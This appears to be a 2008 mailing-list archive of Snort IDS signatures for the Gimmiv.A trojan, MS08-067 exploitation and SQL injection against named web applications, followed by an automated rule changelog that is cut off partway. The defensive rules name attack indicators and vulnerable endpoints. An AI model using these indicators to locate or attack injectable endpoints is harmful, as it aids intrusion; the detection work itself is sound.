Fri, 24 Oct 2008 09:15:30 -0400 Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig In-Reply-To: <637078af0810232125vcac0298j102120cc10878fd1@mail.gmail.com> References: <789A6CF2A624E54184956F80CCCAE8600143FA14@CPWP016I.ercot.com> <49010F2A.6020802@jonkmans.com> <637078af0810232125vcac0298j102120cc10878fd1@mail.gmail.com> Message-ID: <4901CA72.1050005@jonkmans.com> I've updated to reflect that, thanks dxp. Matt dxp wrote: > Looking at other Gimmiv threatexpert reports it appears that > "/test2.php" is not static, the number varies. So far it looks like a > single digit integer, so perhaps a pattern match for something like > "/test[0-9].php" would be better. > -- > dxp > > On Thu, Oct 23, 2008 at 7:56 PM, Matt Jonkman > wrote: > > Done deal, posted! > > Thanks Michael > > Matt > > Sconzo, Michael wrote: > > I've got no good reason other then that's what I came up with > originally > > in a quick-n-dirty fashion. :) > > > > It's probably better to switch to uricontent. > > > > -=Mike > > > > -----Original Message----- > > From: Matt Jonkman [mailto:jonkman at jonkmans.com > ] > > Sent: Thursday, October 23, 2008 6:49 PM > > To: Sconzo, Michael > > Cc: Emerging Threats Signatures > > Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > > > Hi Michael. Posting now sorry for the delay. Any reason not to go > > uricontent on these? > > > > matt > > > > Sconzo, Michael wrote: > >> I've gotten a couple of pings about this. Here's some more info: > >> http://www.virustotal.com/analisis/aa0b4951ba47a5780a4fe9d0fdf6d521 > >> > >> Check out the threat expert link at the bottom for some analysis of > > the > >> software. > >> > >> -=Mike > >> > >> -----Original Message----- > >> From: emerging-sigs-bounces at emergingthreats.net > > >> [mailto:emerging-sigs-bounces at emergingthreats.net > ] On Behalf Of > > Sconzo, > >> Michael > >> Sent: Thursday, October 23, 2008 4:58 PM > >> To: Emerging Threats Signatures > >> Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > >> > >> Need to remove the depth 11: > >> > >> alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > >> Gimmiv.A.dll Infection"; flow: to_server,established; > >> content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > >> nocase; classtype: trojan-activity; sid: 0000000; rev:2;) > >> > >> -----Original Message----- > >> From: emerging-sigs-bounces at emergingthreats.net > > >> [mailto:emerging-sigs-bounces at emergingthreats.net > ] On Behalf Of > > Sconzo, > >> Michael > >> Sent: Thursday, October 23, 2008 4:55 PM > >> To: Emerging Threats Signatures > >> Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > >> > >> Haven't had a good chance to test this, but it seems like it will > > catch > >> at least > >> > > > http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin > >> 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but > > you > >> can at least get a handle on any infected machines. > >> > >> Just needs a real sid in the sig. > >> > >> > >> alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > >> Gimmiv.A.dll Infection"; flow: to_server,established; > >> content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > >> nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) > >> > >> I could be off-base on this one, if so sorry for the noise. > >> > >> -=Mike > >> > >> --- > >> Mike Sconzo > > >> ERCOT Security Operations > >> > >> _______________________________________________ > >> Emerging-sigs mailing list > >> Emerging-sigs at emergingthreats.net > > >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > >> _______________________________________________ > >> Emerging-sigs mailing list > >> Emerging-sigs at emergingthreats.net > > >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > >> _______________________________________________ > >> Emerging-sigs mailing list > >> Emerging-sigs at emergingthreats.net > > >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > > > -- > -------------------------------------------- > Matthew Jonkman > Emerging Threats > Phone 765-429-0398 > Fax 312-264-0205 > http://www.emergingthreats.net > -------------------------------------------- > > PGP: http://www.jonkmans.com/mattjonkman.asc > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Fri Oct 24 10:54:18 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Fri, 24 Oct 2008 10:54:18 -0400 Subject: [Emerging-Sigs] MS08-067 Message-ID: <4901E19A.7050203@jonkmans.com> I had a mistake in 4 of the original sigs. I had put in a decimal ascii for "/" versus the hex. Read the wrong column. :) Just fixed and pushed, I recommend updating asap! Thanks to those that pointed out my mistake!! Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Fri Oct 24 11:30:23 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Fri, 24 Oct 2008 11:30:23 -0400 Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-22-2008 In-Reply-To: <1224707070.15370.24.camel@clarity.local.home> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290D@webmail.latis.com> <1224707070.15370.24.camel@clarity.local.home> Message-ID: <4901EA0F.9040005@jonkmans.com> Robert Kerr wrote: > Can we have a discussion on the merits of pcre:"/UNION.+SELECT/Ui"; as > appears in many of these rules. Two concerns: > > a) PCREs are slow and should be always be well anchored. Would make > sense to precede each pcre with a uricontent:"UNION"; to prevent ?the > pcre firing on every hit to pages which are otherwise legit Ya, agreed there. I can modify these last few that we didn't have that. > > b) The .+ seems overly permissive in that it allows 1 or more of any > character in between the union and select? a quick look at other rules > of these type seems to suggest they use UNION\s+SELECT I can't think of a character in between other than a space (after it's been normalized) that'd be valid. The real url would have a %20 likely, but thatll normalize to a space. Will modify these recent ones as well to reflect. Are there others I need to look at as well? Matt > > Compare for example this rule: > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB > Cacti SQL Injection Vulnerability graph_view graph_list UNION SELECT"; > flow:established,to_server; uricontent:"graph_view.php?"; nocase; > uricontent:"graph_list="; nocase; uricontent:"UNION"; nocase; > pcre:"/.+UNION\s+SELECT/Ui"; classtype:web-application-attack; > reference:cve,CVE-2008-0785; reference:bugtraq,27749; sid:2007889; > rev:2;) > > Not having looked deeply at any of the bugs concerned it may be possible > there's something odd going on that makes \s+ not suitable? > -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Fri Oct 24 11:41:56 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Fri, 24 Oct 2008 11:41:56 -0400 Subject: [Emerging-Sigs] StillSecure: 4 New Signatures - Oct-24-2008 In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290E@webmail.latis.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290E@webmail.latis.com> Message-ID: <4901ECC4.7080307@jonkmans.com> Added as well. I changed the pcre x+ to a \s+ Thanks!! Matt signatures wrote: > Hi Matt, > > > > Please find 4 New Signatures below: > > > > *1. **Simple Customer contact.php SQL injection * > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Simple > Customer contact.php SQL injection"; flow:to_server,established; > content:"GET "; depth:4; uricontent:"/contact.php?id="; nocase; > uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; > classtype:web-application-attack; reference:bugtraq,28852; sid:8518; rev:1;) > > > > *2. **ShopMaker product.php id Parameter Remote SQL Injection * > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ShopMaker > product.php id Parameter Remote SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/product.php?id="; nocase; uricontent:"UNION"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,www.milw0rm.com/exploits/6799; reference:bugtraq,31854; > sid:8519; rev:1;) > > > > *3. **Bahar Download Script aspkat.asp SQL Injection * > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Bahar > Download Script aspkat.asp SQL Injection"; flow:established,to_server; > content:"GET "; depth:4; uricontent:"/aspkat.asp?kid="; nocase; > uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; > classtype:web-application-attack; reference:bugtraq,31852; sid:8520; rev:1;) > > > > *4. **WordPress Newsletter Plugin newsletter Parameter SQL Injection * > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WordPress > Newsletter Plugin newsletter Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/st_newsletter/stnl_iframe.php"; nocase; > uricontent:"?newsletter="; nocase; uricontent:"UNION"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/6777; > reference:url,secunia.com/advisories/32336; sid:8521; rev:1;) > > > Looking forward for your comments if any... > > Thanks & Regards, > StillSecure > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Fri Oct 24 14:42:26 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Fri, 24 Oct 2008 14:42:26 -0400 Subject: [Emerging-Sigs] Gimiv Pings Message-ID: <49021712.7090207@jonkmans.com> alert icmp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Gimiv Infection Ping Outbound"; icode:0; itype:8; dsize:20; content:"abcde12345fghij6789"; classtype:trojan-activity; sid:2008726; rev:1;) Caught the Gimiv samples in the sandnet making an outbound ping to two google IPs. They must be hardcoded as it does not look them up. But the payload is unique, as seen above. This sig is posted, and I'll put up one for inbound pings, just in case it uses that to start ping sweeps. Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Fri Oct 24 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Fri, 24 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081024200008.D229E45026@goliath.jonkmans.com> [***] Results from Oinkmaster started Fri Oct 24 16:00:08 2008 [***] [+++] Added rules: [+++] 2008689 - ET TROJAN Gimmiv.A.dll Infection (emerging-virus.rules) 2008690 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1) (emerging-exploit.rules) 2008691 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2) (emerging-exploit.rules) 2008692 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3) (emerging-exploit.rules) 2008693 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4) (emerging-exploit.rules) 2008694 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5) (emerging-exploit.rules) 2008695 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (6) (emerging-exploit.rules) 2008696 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7) (emerging-exploit.rules) 2008697 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8) (emerging-exploit.rules) 2008698 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9) (emerging-exploit.rules) 2008699 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10) (emerging-exploit.rules) 2008700 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (emerging-exploit.rules) 2008701 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11) (emerging-exploit.rules) 2008702 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12) (emerging-exploit.rules) 2008703 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13) (emerging-exploit.rules) 2008704 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14) (emerging-exploit.rules) 2008705 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) (emerging-exploit.rules) 2008706 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16) (emerging-exploit.rules) 2008707 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17) (emerging-exploit.rules) 2008708 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18) (emerging-exploit.rules) 2008709 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19) (emerging-exploit.rules) 2008710 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20) (emerging-exploit.rules) 2008711 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (21) (emerging-exploit.rules) 2008712 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22) (emerging-exploit.rules) 2008713 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23) (emerging-exploit.rules) 2008714 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24) (emerging-exploit.rules) 2008715 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) (emerging-exploit.rules) 2008716 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (26) (emerging-exploit.rules) 2008717 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27) (emerging-exploit.rules) 2008718 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28) (emerging-exploit.rules) 2008719 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29) (emerging-exploit.rules) 2008720 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30) (emerging-exploit.rules) 2008721 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2) (emerging-exploit.rules) 2008722 - ET WEB_SPECIFIC Simple Customer contact.php SQL injection (emerging-web_sql_injection.rules) 2008723 - ET WEB_SPECIFIC ShopMaker product.php id Parameter Remote SQL Injection (emerging-web_sql_injection.rules) 2008724 - ET WEB_SPECIFIC Bahar Download Script aspkat.asp SQL Injection (emerging-web_sql_injection.rules) 2008725 - ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection (emerging-web_sql_injection.rules) 2008726 - ET TROJAN Gimmiv Infection Ping Outbound (emerging-virus.rules) 2008727 - ET TROJAN Gimmiv Infection Ping Inbound (emerging-virus.rules) [///] Modified active rules: [///] 2008668 - ET WEB_SPECIFIC myEvent viewevent.php SQL Injection (emerging-web_sql_injection.rules) 2008669 - ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection (emerging-web_sql_injection.rules) 2008670 - ET WEB_SPECIFIC SweetCMS page SQL Injection (emerging-web_sql_injection.rules) 2008672 - ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection (emerging-web_sql_injection.rules) 2008673 - ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack (emerging-exploit.rules) 2008681 - ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php (emerging-malware.rules) 2008688 - ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection (emerging-web_sql_injection.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-exploit.rules (1): #by Secureworks -> Added to emerging-sid-msg.map (42): 2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || url,www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz 2008689 || ET TROJAN Gimmiv.A.dll Infection || url,www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin32%2fGimmiv.A 2008690 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008691 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008692 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008693 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008694 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008695 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (6) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008696 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008697 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008698 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008699 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008700 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008701 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008702 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008703 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008704 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008705 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008706 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008707 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008708 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008709 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008710 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008711 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (21) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008712 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008713 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008714 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008715 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008716 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (26) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008717 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008718 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008719 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008720 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008721 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008722 || ET WEB_SPECIFIC Simple Customer contact.php SQL injection || bugtraq,28852 2008723 || ET WEB_SPECIFIC ShopMaker product.php id Parameter Remote SQL Injection || bugtraq,31854 || url,www.milw0rm.com/exploits/6799 2008724 || ET WEB_SPECIFIC Bahar Download Script aspkat.asp SQL Injection || bugtraq,31852 2008725 || ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection || url,secunia.com/advisories/32336 || url,milw0rm.com/exploits/6777 2008726 || ET TROJAN Gimmiv Infection Ping Outbound 2008727 || ET TROJAN Gimmiv Infection Ping Inbound 2400008 || ET DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso 2401008 || ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso -> Added to emerging-sid-msg.map.txt (42): 2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || url,www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz 2008689 || ET TROJAN Gimmiv.A.dll Infection || url,www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin32%2fGimmiv.A 2008690 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008691 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008692 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008693 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008694 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008695 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (6) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008696 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008697 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008698 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008699 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008700 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008701 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008702 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008703 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008704 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008705 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008706 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008707 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008708 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008709 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 